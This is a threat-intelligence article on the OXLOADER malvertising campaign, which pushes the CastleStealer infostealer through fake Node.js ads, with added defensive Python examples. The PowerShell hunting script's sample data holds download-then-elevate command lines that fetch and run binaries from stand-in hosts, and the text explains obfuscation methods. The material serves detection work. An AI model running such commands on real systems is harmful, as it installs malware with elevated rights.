Elastic Security Labs has published research on OXLOADER, a previously undocumented malware loader that uses malicious Google Ads as its initial access vector and delivers the CastleStealer information stealer as its final payload. Tracked as campaign REF8372, the operation demonstrates sophisticated engineering investment — including multiple layers of obfuscation, anti-sandbox techniques, and abuse of legitimate cloud infrastructure — designed to ensure long-term operational durability.
Initial Access: Malvertising via Google Ads
The campaign begins with the threat actors purchasing Google Ads under a fraudulent Ukrainian advertiser identity ("ВОЛОДИМИР ТЕРЕЩЕНКО") and targeting high-volume developer search terms. Specifically, the ads appeared for queries such as "latest version of node.js", which reach a large, technically oriented audience that is already intending to download and install software.
Clicking the ad redirects victims to a spoofed domain: node-js[.]prentiva99[.]info
The fake site presents a convincing installation wizard as a decoy while a PowerShell command downloads the OXLOADER binary in the background from Storj, a decentralized cloud storage platform. The choice of Storj is deliberate: payloads on decentralized infrastructure survive conventional domain takedowns, and the platform's legitimate gateway domains are unlikely to appear on domain reputation blocklists.
The downloaded binary is then launched via PowerShell's Start-Process with the -Verb RunAs parameter, which triggers a Windows UAC prompt requesting elevated privileges before the payload runs. A victim who has just clicked through an installer is primed to approve that prompt, so the loader obtains administrator rights by consent rather than by exploiting a privilege-escalation flaw.
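The download-then-elevate sequence above is the behavioral signal a SOC can hunt for in PowerShell script block logging (Event ID 4104 ScriptBlockText). The following is an added example written for this page, not code from Elastic Security Labs or from the REF8372 report. The script block text, the event IDs, the scoring weights and the assumption that a Storj-hosted payload is fetched from a host whose name contains "storj" are all constructed for illustration; replace the host check with the gateway names seen in your own telemetry.

```python
"""Hunting heuristic for a PowerShell download-then-elevate chain (added example)."""
import re

# Constructed sample script-block text, keyed by a made-up event ID.
# evt-1 models the REF8372 pattern: fetch from a Storj-like host, then Start-Process -Verb RunAs.
# evt-4 models the same chain against an arbitrary IP with a hidden window; evt-2/3 are benign.
SAMPLE_SCRIPT_BLOCKS = {
    "evt-1": r"""Invoke-WebRequest -Uri 'https://gateway.example-storj.test/bucket/setup.exe' -OutFile $env:TEMP\setup.exe; Start-Process -FilePath $env:TEMP\setup.exe -Verb RunAs""",
    "evt-2": r"""Get-ChildItem C:\Users | Where-Object { $_.PSIsContainer }""",
    "evt-3": r"""Start-Process -FilePath 'C:\Program Files\nodejs\node.exe' -ArgumentList '--version'""",
    "evt-4": r"""(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/update.bin', "$env:APPDATA\update.bin"); Start-Process "$env:APPDATA\update.bin" -Verb RunAs -WindowStyle Hidden""",
}

# PowerShell is case-insensitive, so every pattern is compiled with re.I.
RULES = {
    "download": re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadFile|DownloadString|Start-BitsTransfer",
        re.I,
    ),
    # Start-Process ... -Verb RunAs within one statement (no ';' or pipe in between).
    "runas": re.compile(r"Start-Process[^;\n|]*-Verb\s+RunAs", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    # Dropping the binary into a user-writable location before elevating.
    "user_writable_path": re.compile(r"\$env:(TEMP|TMP|APPDATA|LOCALAPPDATA)\b", re.I),
}

URL_RE = re.compile(r"""https?://([^/'"\s)]+)""", re.I)
# Assumption for this example only: a Storj-hosted payload is served from a host containing "storj".
SUSPECT_HOST_SUBSTRINGS = ("storj",)


def extract_hosts(text):
    """Return the lower-cased host part of every http(s) URL in a script block."""
    return [m.group(1).lower() for m in URL_RE.finditer(text)]


def analyze(text):
    """Score one script block. The download+RunAs combination is weighted heavily
    because that pairing, not either half alone, is what the campaign relies on."""
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    hosts = extract_hosts(text)
    if any(s in h for h in hosts for s in SUSPECT_HOST_SUBSTRINGS):
        hits.append("suspect_host")
    score = len(hits)
    if "download" in hits and "runas" in hits:
        score += 5
    return {"score": score, "hits": hits, "hosts": hosts}


def triage(blocks, threshold=6):
    """Return (event_id, result) pairs at or above the threshold, highest score first."""
    scored = [(eid, analyze(txt)) for eid, txt in blocks.items()]
    flagged = [(eid, r) for eid, r in scored if r["score"] >= threshold]
    return sorted(flagged, key=lambda t: -t[1]["score"])


if __name__ == "__main__":
    for eid, result in triage(SAMPLE_SCRIPT_BLOCKS):
        print(eid, result["score"], result["hits"], result["hosts"])
```

The threshold is deliberately set so that a lone Start-Process -Verb RunAs (common in legitimate admin scripts) or a lone Invoke-WebRequest never fires on its own; only the chain does. Feed real 4104 events through `analyze` and tune the weights against your own baseline before alerting on them.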
Google removed the fraudulent advertiser account and associated campaigns on May 14, 2026, though the infrastructure remained active and the campaign had been running for an undetermined period before discovery.
OXLOADER: Obfuscation Engineering
OXLOADER is a heavily engineered loader designed with analyst evasion as a primary design goal. Elastic Security Labs identified the following anti-analysis techniques:
| Technique | Description |
|---|---|
| Control-flow flattening | Replaces structured control flow with a dispatcher-driven state machine, so a decompiler recovers a loop over a switch instead of the original logic |
| Opaque predicates | Inserts conditionals whose outcome is fixed but not obvious to static analysis, so dead branches look reachable and the disassembly is padded with junk paths |
| Mixed Boolean-Arithmetic (MBA) | Rewrites simple arithmetic as equivalent mixtures of bitwise and arithmetic operations that resist pattern matching and simplification |
| Self-modifying decryption stubs | Decryption routines rewrite their own code at runtime, so the bytes on disk never match the bytes that execute |
| .reloc section abuse | Stages shellcode inside the binary's relocation section, a location tooling and analysts rarely treat as code |
| Anti-VM / sandbox detection | Environment checks that abort execution inside automated analysis systems |
| DLL side-loading | A rogue DLL loaded by a legitimate executable decrypts and executes the final payload |
The combination of these techniques produces a binary that static analysis engines have significant difficulty fingerprinting. Elastic reported low detection rates against static analysis engines at time of discovery.
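To make two of the table's entries concrete, here is an added example (written for this page; it is not OXLOADER's code and Elastic's report does not disclose the loader's actual expressions) showing what an MBA rewrite of a 32-bit addition and an opaque predicate look like, together with the sampling check an analyst runs to decide whether a suspicious expression is just an obfuscated version of something simple. The identities, the 32-bit width and the trial count are choices made for the illustration.

```python
"""MBA and opaque-predicate illustration, plus an analyst-side equivalence check (added example)."""
import random

MASK = 0xFFFFFFFF  # model 32-bit unsigned machine arithmetic


def plain_add(x, y):
    return (x + y) & MASK


def mba_add(x, y):
    # Identity: x + y == (x ^ y) + 2 * (x & y)   (carry-less sum plus the carries)
    return ((x ^ y) + 2 * (x & y)) & MASK


def mba_add_deeper(x, y):
    # A second rewrite layer, x ^ y == (x | y) - (x & y), gives the shape a
    # rewriting obfuscator produces after several passes: no '+' in sight.
    return (((x | y) - (x & y)) + ((x & y) << 1)) & MASK


def opaque_always_true(n):
    # n * (n + 1) is always even, so this branch condition is always true.
    # A disassembler that does not reason about arithmetic sees a live branch
    # and follows whatever junk sits on the "false" side.
    return ((n * (n + 1)) & 1) == 0


def probably_equivalent(f, g, trials=10_000, seed=0):
    """Cheap triage for a suspected MBA expression: compare f and g on edge
    values and on random 32-bit inputs. A mismatch proves inequivalence; a
    clean run is strong evidence, after which a symbolic proof is worth the time."""
    rng = random.Random(seed)  # fixed seed keeps the check reproducible
    edge = [0, 1, MASK, 0x80000000, 0x7FFFFFFF]
    for x in edge:
        for y in edge:
            if f(x, y) != g(x, y):
                return False
    for _ in range(trials):
        x, y = rng.getrandbits(32), rng.getrandbits(32)
        if f(x, y) != g(x, y):
            return False
    return True


if __name__ == "__main__":
    print("mba_add == plain_add:", probably_equivalent(mba_add, plain_add))
    print("mba_add_deeper == plain_add:", probably_equivalent(mba_add_deeper, plain_add))
    print("opaque predicate holds for 0..9999:", all(opaque_always_true(n) for n in range(10_000)))
```

The practical point is that each rewrite is semantics-preserving, so the loader still computes the same offsets and keys, while a signature written against the original instruction sequence no longer matches. The sampling check is how you decide, before investing in a solver, that a block of shifts and masks is really just an addition.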
As Elastic researchers noted: "The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and unique staging techniques reflect deliberate engineering choices to evade analysis."
Final Payload: CastleStealer
The ultimate objective of the OXLOADER chain is deploying CastleStealer, a .NET-based information stealer. CastleStealer is not new — it was previously documented in the BackgroundFix campaign, where it was distributed alongside CastleLoader masquerading as free image-editing software. CastleLoader is attributed to the GrayBravo threat activity cluster.
Information stealers in this class typically target:
- Browser-saved credentials and cookies
- Cryptocurrency wallet data
- Authentication tokens stored by desktop applications
- System and network reconnaissance data
The reuse of CastleStealer from BackgroundFix, combined with the presence of CastleLoader tooling associated with GrayBravo, suggests infrastructure or actor overlap between REF8372 and prior campaigns.
Attribution: Russia-Nexus Indicators
No formal attribution has been made, but several indicators point toward Russian-speaking threat actors with financial motivation:
- CIS region exclusion: Machines in Commonwealth of Independent States (CIS) countries are deliberately excluded from infection, a hallmark operational security practice among Eastern European cybercriminal groups, who avoid victimizing their home jurisdictions to stay clear of local law enforcement
- GrayBravo correlation: The presence of CastleLoader tooling connects REF8372 to the GrayBravo cluster
- Financial motivation: The infostealer payload is consistent with credential theft-for-profit operations rather than espionage
Indicators of Compromise
| Indicator | Value |
|---|---|
| Fake domain | node-js[.]prentiva99[.]info |
| Payload host | Storj (decentralized cloud storage) |
| OXLOADER SHA-256 | 9a9939dff297997732aaade9b243d695632cbd64033c5fbcb9de3d09b7e6c28d |
| Campaign ID | REF8372 |
| Related malware | CastleLoader, CastleStealer |
| Related cluster | GrayBravo |
| Related campaign | BackgroundFix |
What Makes REF8372 Notable
Three elements of this campaign stand out:
Legitimate infrastructure abuse at scale. Hosting payloads on Storj, a legitimate decentralized cloud platform, provides resilience against takedowns and blends into normal cloud storage traffic. This is increasingly common among sophisticated threat actors.
Developers as a high-value target. Targeting searches for developer tools is strategic — developers typically have access to source code repositories, CI/CD pipelines, cloud credentials, and internal APIs. A compromised developer workstation can have significantly higher blast radius than a standard user endpoint.
Engineering investment signals long-term intent. The depth of obfuscation in OXLOADER — multiple stacked anti-analysis layers, self-modifying stubs, .reloc section staging — represents substantial development effort. This is not a one-off campaign tool; the actors clearly expect to reuse this loader across multiple operations.
Organizations should ensure their endpoint security tooling performs behavioral analysis (process lineage, PowerShell script block logging, and download-then-elevate sequences such as a web fetch followed by a UAC elevation request) rather than relying solely on static signatures for loader detection, and should consider DNS-level blocking of known malvertising infrastructure as a supplementary control.